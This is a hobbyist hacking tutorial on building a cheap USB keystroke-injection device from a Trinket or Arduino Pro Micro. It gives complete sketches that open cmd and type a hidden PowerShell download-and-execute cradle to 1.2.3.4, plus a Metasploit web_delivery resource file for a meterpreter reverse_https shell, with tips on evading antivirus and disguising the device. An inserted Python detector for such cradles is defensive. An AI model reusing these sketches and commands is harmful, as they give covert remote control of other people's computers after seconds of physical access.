Hacking a computer in 3 seconds. Making a USB Duck from scratch on Arduino

Let's start with the traditional "This material is presented for educational purposes only". If you use this information to hack HBO and release the next Game of Thrones season for free on YouTube, well... great. In the sense that I do not encourage such behavior.
If you don't know what a "Rubber Ducky" (USB Rubber Ducky) is, it's the device made by Hak5 shown in the photo. It looks and behaves like an ordinary flash drive, but it can be programmed to type keystrokes very quickly. The "Duck" is able to crack any system in a few seconds. The only drawback is that you need physical access to the computer. And it costs $50, which is why I wrote this article.
We use a 5V Adafruit Trinket and a microUSB cable; that's all we need.
Fortunately, Adafruit provides a library for a USB keyboard interface, so let's #include it right away. You will need to install the library following this instruction.
#include <TrinketKeyboard.h>
To get a feel for the library, let's start by initializing the stick as a HID device with the begin() method.
#include <TrinketKeyboard.h>

void setup() {
  TrinketKeyboard.begin();   // enumerate as a USB HID keyboard
}

void loop() {
  TrinketKeyboard.print("Help, I am trapped in a computer!\n");
  delay(500);
}
Looks good. Now let's run commands on the victim's computer. This is done by pressing Win+R, typing cmd, pressing Enter, and then typing the command itself.
#include <TrinketKeyboard.h>

// pressKey(modifiers, keycode) takes USB HID usage IDs; 0x28 is Enter.
void pressEnter() {
  TrinketKeyboard.pressKey(0, 0x28);
  delay(10);
  TrinketKeyboard.pressKey(0, 0);   // release all keys
  delay(300);
}

// Win+R: modifier 0x08 is the left GUI (Windows) key, 0x15 is 'r'.
void winRun() {
  TrinketKeyboard.pressKey(0x08, 0x15);
  delay(30);
  TrinketKeyboard.pressKey(0, 0);
}

void setup() {
  TrinketKeyboard.begin();
  delay(1000);   // give the host time to enumerate the device
  winRun();
  delay(100);
  winRun();
  delay(300);
  // Run cmd
  TrinketKeyboard.print("cmd");
  pressEnter();
  delay(500);
  TrinketKeyboard.print("ipconfig");
  delay(100);
  pressEnter();
}

void loop() {
  // nothing happens after setup
}
Fine. Now let's set up the exploit in the Metasploit framework.
We will use the web_delivery module.
I chose it because it is fast and unlikely to trigger antivirus. It also writes nothing to disk, so it leaves no traces when it's done.
Our target here is 64-bit Windows 10, so we'll pick the PowerShell target, but keep in mind this is not an exploit against PowerShell itself. We just use the shell to download the necessary files from the server.
use exploit/multi/script/web_delivery
We need to tell our program where to get the binaries from:
set LHOST 1.2.3.4
Then we pick a port that won't raise suspicion. How about 443? ;)
set LPORT 443
Metasploit generates a random URIPATH each time, and we want to be able to start and stop listening on the port at any time without having to recompile the code for the flash drive.
set URIPATH /
Now we need to choose PowerShell as the delivery method. The module supports three targets identified by number: 0: Python, 1: PHP and 2: PowerShell.
set TARGET 2
Now set the payload. I use reverse_https because we are working on port 443; to most intrusion detection systems it will look like an ordinary connection.
set PAYLOAD windows/meterpreter/reverse_https
And finally:
exploit
To conveniently stop and resume listening on the port, put all of this in a resource file, usb.rc:
use exploit/multi/script/web_delivery
set LHOST 1.2.3.4
set LPORT 443
set URIPATH /
set TARGET 2
set PAYLOAD windows/meterpreter/reverse_https
exploit
Metasploit gives us the command to run on the victim's computer:
powershell.exe -nop -w hidden -c $N = new-object net.webclient; $N.proxy = [Net.WebRequest]::GetSystemWebProxy(); $N.Proxy.Credentials = [Net.CredentialCache]::DefaultCredentials; IEX $N.downloadstring('http://1.2.3.4:8080/');
Now we can type it from the flash drive.
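That one-liner is also exactly what a defender sees in process-creation telemetry (Windows event 4688 with command-line auditing enabled, or Sysmon event 1). As an added example that is not part of the original article, here is a small Python detector that scores PowerShell command lines for the cradle's indicators and flags lines where several co-occur; the event lines and their key=value layout are constructed for the example.

```python
"""Flag PowerShell download cradles (like the web_delivery one-liner) in
process-creation events. Added example; every log line below is constructed."""
import re

# Each indicator is (name, pattern). The one-liner the duck types hits all four;
# routine admin invocations of powershell.exe usually hit one at most.
INDICATORS = [
    ("no-profile",      re.compile(r"-no(?:p|profile)\b", re.I)),
    ("hidden-window",   re.compile(r"-w(?:indowstyle)?\s+hidden\b", re.I)),
    ("invoke-expr",     re.compile(r"\b(?:iex|invoke-expression)\b", re.I)),
    ("download-cradle", re.compile(r"net\.webclient|downloadstring", re.I)),
]

def indicators_for(cmdline):
    """Names of the indicators present in one command line."""
    return [name for name, pat in INDICATORS if pat.search(cmdline)]

def is_download_cradle(cmdline, threshold=3):
    """A cradle needs several indicators to co-occur; one alone is noise."""
    return len(indicators_for(cmdline)) >= threshold

def command_line_of(event):
    """Pull the CommandLine field out of a key=value event line (constructed format)."""
    m = re.search(r"CommandLine=(.*)$", event)
    return m.group(1) if m else ""

def scan_log(events, threshold=3):
    """Return [(event_number, indicator_names)] for every flagged event."""
    hits = []
    for n, ev in enumerate(events, start=1):
        names = indicators_for(command_line_of(ev))
        if len(names) >= threshold:
            hits.append((n, names))
    return hits

# Constructed 4688-style events; event 1 is the exact one-liner from the article,
# event 4 the same cradle with long-form switches, the rest are benign.
SAMPLE_EVENTS = [
    r"EventID=4688 Parent=C:\Windows\System32\cmd.exe CommandLine=powershell.exe -nop -w hidden -c $N = new-object net.webclient; $N.proxy = [Net.WebRequest]::GetSystemWebProxy(); $N.Proxy.Credentials = [Net.CredentialCache]::DefaultCredentials; IEX $N.downloadstring('http://1.2.3.4:8080/');",
    r"EventID=4688 Parent=C:\Windows\System32\svchost.exe CommandLine=powershell.exe -ExecutionPolicy Bypass -File C:\scripts\backup.ps1",
    r"EventID=4688 Parent=C:\Windows\explorer.exe CommandLine=powershell.exe -nop -c Get-Service",
    r"EventID=4688 Parent=C:\Windows\System32\cmd.exe CommandLine=PowerShell.exe -NoProfile -WindowStyle Hidden -Command Invoke-Expression (New-Object Net.WebClient).DownloadString('http://EXAMPLE-HOST/')",
    r"EventID=4688 Parent=C:\Windows\explorer.exe CommandLine=notepad.exe C:\notes.txt",
]

if __name__ == "__main__":
    for n, names in scan_log(SAMPLE_EVENTS):
        print(f"event {n}: {', '.join(names)}")
```

Only events 1 and 4 are flagged; the admin script and the lone -nop invocation stay below the threshold, which is the point of scoring co-occurring indicators rather than any single switch.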
#include <TrinketKeyboard.h>

// pressKey(modifiers, keycode) takes USB HID usage IDs; 0x28 is Enter.
void pressEnter() {
  TrinketKeyboard.pressKey(0, 0x28);
  delay(10);
  TrinketKeyboard.pressKey(0, 0);   // release all keys
  delay(300);
}

// Win+R: modifier 0x08 is the left GUI (Windows) key, 0x15 is 'r'.
void winRun() {
  TrinketKeyboard.pressKey(0x08, 0x15);
  delay(30);
  TrinketKeyboard.pressKey(0, 0);
}

void setup() {
  TrinketKeyboard.begin();
  delay(1000);   // give the host time to enumerate the device
  winRun();
  delay(100);
  winRun();
  delay(300);
  // Run cmd
  TrinketKeyboard.print("cmd");
  pressEnter();
  delay(500);
  TrinketKeyboard.print("powershell.exe -nop -w hidden -c $N = new-object net.webclient; $N.proxy = [Net.WebRequest]::GetSystemWebProxy(); $N.Proxy.Credentials = [Net.CredentialCache]::DefaultCredentials; IEX $N.downloadstring('http://1.2.3.4:8080/');");
  delay(100);
  pressEnter();
}

void loop() {
  // nothing happens after setup
}
It works very well. We need about 40 seconds to fuck Daenerys, I mean the victim’s computer.
Because of the limited capabilities of the "duck", the bootloader is not always available as it is on a regular Arduino: you can upload code only while the button on the board is pressed or during the first 30 seconds after power-up. That means that for the first 30 seconds after plugging in the stick we wait for the sketch to actually start running, and then another 10 seconds to type and execute the script. Cutting the access time by 75% would be very useful. This good man edited the firmware to skip the bootloader on power-up. We took the code, reflashed the board, re-uploaded the sketch, and so on; everything works. But you can do even better: it would be nice to hide the board in a case so that it does not arouse suspicion.
I chose one of those inconspicuous USB flash drives that are given away by the million at trade shows, and ordered these neat little microUSB OTG to USB-A adapters. I had to cut off unnecessary parts of the circuit board to fit it in the case, put the OTG adapter into the USB-A housing and glued everything together with superglue. It doesn't look suspicious to me at all, but 10 seconds is still a considerable time, especially when you are hiding from dragons.
You can also order an Arduino Pro Micro on Amazon for around $10. If you have patience, you can even find one on eBay for $3 or $4. I didn't have a USB stick case big enough for the Pro Micro, so I plugged in the OTG adapter, wrapped it in electrical tape and called it done.
We need to change the sketch a bit, because the Pro Micro uses a different library (the standard Arduino Keyboard library), but it works as before.
#include "Keyboard.h"

// Win+R: press the left GUI (Windows) key together with 'r', then release both.
void winRun() {
  Keyboard.press(KEY_LEFT_GUI);
  Keyboard.press('r');
  delay(30);
  Keyboard.releaseAll();
  delay(100);
}

void setup() {
  Keyboard.begin();
  delay(2000);   // give the host time to enumerate the device
  winRun();
  Keyboard.println("cmd");
  Keyboard.write(KEY_RETURN);
  delay(500);
  Keyboard.println("powershell.exe -nop -w hidden -c $C = new-object net.webclient; $C.proxy = [Net.WebRequest]::GetSystemWebProxy(); $C.Proxy.Credentials = [Net.CredentialCache]::DefaultCredentials; IEX $C.downloadstring('http://1.2.3.4:8080/');");
  Keyboard.write(KEY_RETURN);
}

void loop() {
  // nothing happens after setup
}
The biggest advantage of the Pro Micro is its speed. Now we only need 3 seconds of physical access. A real attack on the go. If you intend to use this power, use it for a good cause. Kill Cersei.
